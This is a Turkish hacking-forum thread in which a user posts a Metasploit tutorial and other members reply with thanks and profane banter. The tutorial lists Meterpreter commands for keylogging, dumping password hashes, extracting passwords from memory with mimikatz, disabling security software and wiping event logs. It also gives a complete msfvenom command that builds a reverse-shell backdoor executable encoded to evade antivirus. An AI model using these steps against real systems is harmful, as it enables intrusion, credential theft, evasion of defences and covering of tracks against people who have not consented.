Metasploit / Luntox

'Hack Dökümanları' forumunda Luntox tarafından 12 Aralık 2017 tarihinde açılan konu

Etiketler:
?

Sizce Eğitim İcerikli Makalelere Devam mı / Yararlimi

  1. Taşaklarına Kurban

  2. Hayır bir s*ke yaramaz

Sonuçlar sadece oy verildikten sonra görüntülenebilir.
  1. Luntox Elit Üye

    Mesaj:
    377
    Beğeniler:
    393
    Cinsiyet:
    Erkek
    Hele amına koyayım :) Devam Duranın çocugu olmasin...Daha Çok Tool Var ;)



    -----------------

    Metasploit,Rapid7 firmasının çok önemli bir güvenlik yazılımıdır.
    Metasploit,güvenlik açıkları hakkında bilgi verip bu açıklıklara sızmaya yardımcı
    olan bir yazılımdır.
    Ruby ile yazılmış olan içerisinde exploitler,payloadlar,auxiliaryler ve encoderlerin
    bulunduğu frameworkdur.
    Veritabanı olarak postgresql kullanmaktadır.
    Kali Linux içerisinde kurulu olarak gelmektedir.
    Terminalden msfconsole olarak ve grafiksel olarak Armitage ile kullanılabilir.
    Metasploit içinde Nmap taramasıda yapılabilmektedir.


    ----------------

    Metasploit Terimleri :

    Vulnerability: Türkçede zayıflık anlamına gelen sistemde bulunan açıklıktır.

    Auxiliary: Sızma öncesi sistem hakkında bilgi toplamak için bulunan ek modüller

    Exploit: Türkçesi sömürmek olan sistem açıklığından faydalanarak sisteme sızmamızı
    sağlayan bileşendir

    Payload: Sisteme sızdıktan sonra sistemde istediklerimizi yapmamızı sağlayan bileşendir

    Shellcode: Exploitin içinde bulunan zararlı kod

    Encoder : Exploiti Antivirüs,IDS,IPS ve Firewall dan geçiren bileşendir

    --------------

    Komutlarımiz :


    show Komutu
    İstenilen bileşenleri listeyip görmemizi sağlar.

    show exploits : Metasploit üzerindeki tüm exploitleri gösterir

    show payloads : Metasploit üzerindeki tüm payloadları gösterir

    show targets : Bulunan targetları listeler

    show options: Exploit yada payloadın tüm ayarlarını gösterir.

    use Komutu
    İstenilen exploiti yada payload ı seçmek için kullanılır.
    use <exploit_adi> use <payload_adi>

    set Komutu
    Bir değişkene değer aktarmak için kullanılır.
    set RHOST <hedef (kurban)_ip_adresi>
    set LHOST <local (kendi)_ip_adresimiz>

    setg Komutu
    Değişkenlere global olarak değer atar.Her bir başka exploit yada payload ta o değişkene yeniden değer girmeniz gerekmez.
    setg RHOST <hedef_ip> : RHOST değişkenine global değer atar.
    setg LHOST <local_ip> : LHOST değişkenine global değer atar.


    unset Komutu
    Değişkene aktarılan değeri iptal eder.
    unset LHOST : LHOST değişkeninin değerini iptal eder.
    unset RHOST : RHOST değişkeninin değerini iptal eder.

    exploit ve run Komutu
    Eğer bir exploit seçmiş ve show options komutundan sonra istenilen değerleri
    set komutu ile girildikten sonra exploit denir ve exploit çalıştırılır.
    Eğer bir payload seçmiş isek yine show options komutu girilir ve istenilen değer
    yine set komutu ile girildikten sonra run denir ve payload çalıştırıl

    ---------------

    Meterpreter :

    Meterpreter,Metasploit’in en çok kullanılan payloadlarından biridir.
    Bir sistemde exploit çalıştırdıktan sonra meterpreter satırına düştükten sonra meterpreter
    komutları kullanılır.

    sysinfo : Sistem hakkında bilgi verir.

    getuid : Sisteme hangi yetkilerle erişim sağladığımızı verir.

    getpid : Sistem PID numarasını getirir.

    İpconfig -a : Sistemin Network bilgilerini getirir.


    run checkvm: Hedef makinanın sanal makina olup olmadığına bakar.

    run keylogrecorder : Hedef sistemde keyloger başlatır.

    run getgui -e : Hedef sistemde
    RDP(Remote Desktop Protocol) açar.

    run getcountermeasure : Hedef sistemdeki güvenlik programları devre dışı kılar.

    backgraund : Aktif sessionı arka plana alır.

    ps: Süreçleri gösterir.

    kill PID : PID numaralı süreci öldürür.


    download: Hedeften dosya indirmek için kullanılır.

    migrate : Güvenilir bir process’e geçiş yapmak için kullanılır.

    hashdump : Sistem üzerinde bulunan parola dumplarını çeker.

    Shell : Hedef sistemin komut satırına geçmemizi sağlayan komut.
    load mimikatz : Sisteme mimikatz yüklenir.
    mimikatz_command –f

    sekurlsa::searchPasswords : Bellekteki şifreleri getirir.

    clearev : Eventlogları temizler.

    run event_manager -c : Tüm eventlogları silmemizi sağlar.


    Daha bir çok meterpreter komutu bulunmaktadır.En çok kullanılanlara değinmeye
    çalıştım.
    Sızma testinin asıl amacı unutulmamalıdır sisteme zarar vermeden ele geçirilen tüm
    bilgiler ekran görüntüleri alınarak şifreler not alınarak kullanıcıya rapor sunmaktır.
    Sisteme sızıp hakkında yeterli bilgi toplandığında mutlaka sistemden çıkış yapılmalı ve loglar temizlenmelidir.

    --------------------
    MSFVenom :

    MSFVenom, msfpayload ve msfencode u birleştirerek karşımıza gelmiştir.
    MSFVenom ile backdoor oluşturmamızı sağlar.
    msfvenom -h ile tüm parametrelerine ulaşabilirsiniz.

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.237.128
    LPORT=4444 -f exe -o /root/Desktop/zararli.exe -e x86/shikata_ga_nai -i 20
    Yukarıdaki msfvenom komutu ile payloadımızı seçtikten sonra haberleşeceği ip ve
    portu belirterek zararlı.exe oluşturarak shikata_ga_nai ile 20 kere encode ettik.

    Diger konu nmap ;)

    PowerHack !
    Luntox !
     
    Unlovable, DaRkMoRs, Luxury ve 1 kişi daha bunu beğendi.
  2. root Hacking & Security PH. Özel Kuvvetler

    Mesaj:
    437
    Beğeniler:
    477
    Cinsiyet:
    Erkek
    Eline Sağlık Kardeşim :)
     
    Luntox bunu beğendi.
  3. Luxury Sorunsuz Site Yetkilisi Administrator

    Mesaj:
    284
    Beğeniler:
    521
    Cinsiyet:
    Erkek
    Şehir:
    Moskova
    Eline sağlık.
     
    Luntox ve root bunu beğendi.
  4. sachi-sama Kayıtlı Üye

    Mesaj:
    7
    Beğeniler:
    12
    Cinsiyet:
    Erkek
    Şehir:
    TRTRTR
    Eline sağlık.
     
    Luntox ve root bunu beğendi.
  5. Unlovable Sevilmeyen Kayıtlı Üye

    Mesaj:
    255
    Beğeniler:
    393
    Cinsiyet:
    Erkek
    Devam et tırrek :d eline sağlık
     
    SoulFly ve Luntox bunu beğendi.
  6. Luntox Elit Üye

    Mesaj:
    377
    Beğeniler:
    393
    Cinsiyet:
    Erkek
    Ey
    Eyvallah gözüm ;)
     
    SoulFly ve root bunu beğendi.
  7. Luntox Elit Üye

    Mesaj:
    377
    Beğeniler:
    393
    Cinsiyet:
    Erkek
    Sağol Baskanım .
     
    root bunu beğendi.
  8. Luntox Elit Üye

    Mesaj:
    377
    Beğeniler:
    393
    Cinsiyet:
    Erkek
    Eyvallah animeci ;) ..
     
    SoulFly ve root bunu beğendi.
  9. Luntox Elit Üye

    Mesaj:
    377
    Beğeniler:
    393
    Cinsiyet:
    Erkek
    Sen diyeceksin ben devam etmeyeceğim haaa :D duranı s*ksinler ;)
     
    SoulFly ve root bunu beğendi.
  10. Luntox Elit Üye

    Mesaj:
    377
    Beğeniler:
    393
    Cinsiyet:
    Erkek
    Bu arada :D Taşaklarıma Kurban xD .d jsjs
     
    SoulFly ve root bunu beğendi.
Yükleniyor...

Bu Sayfayı Paylaş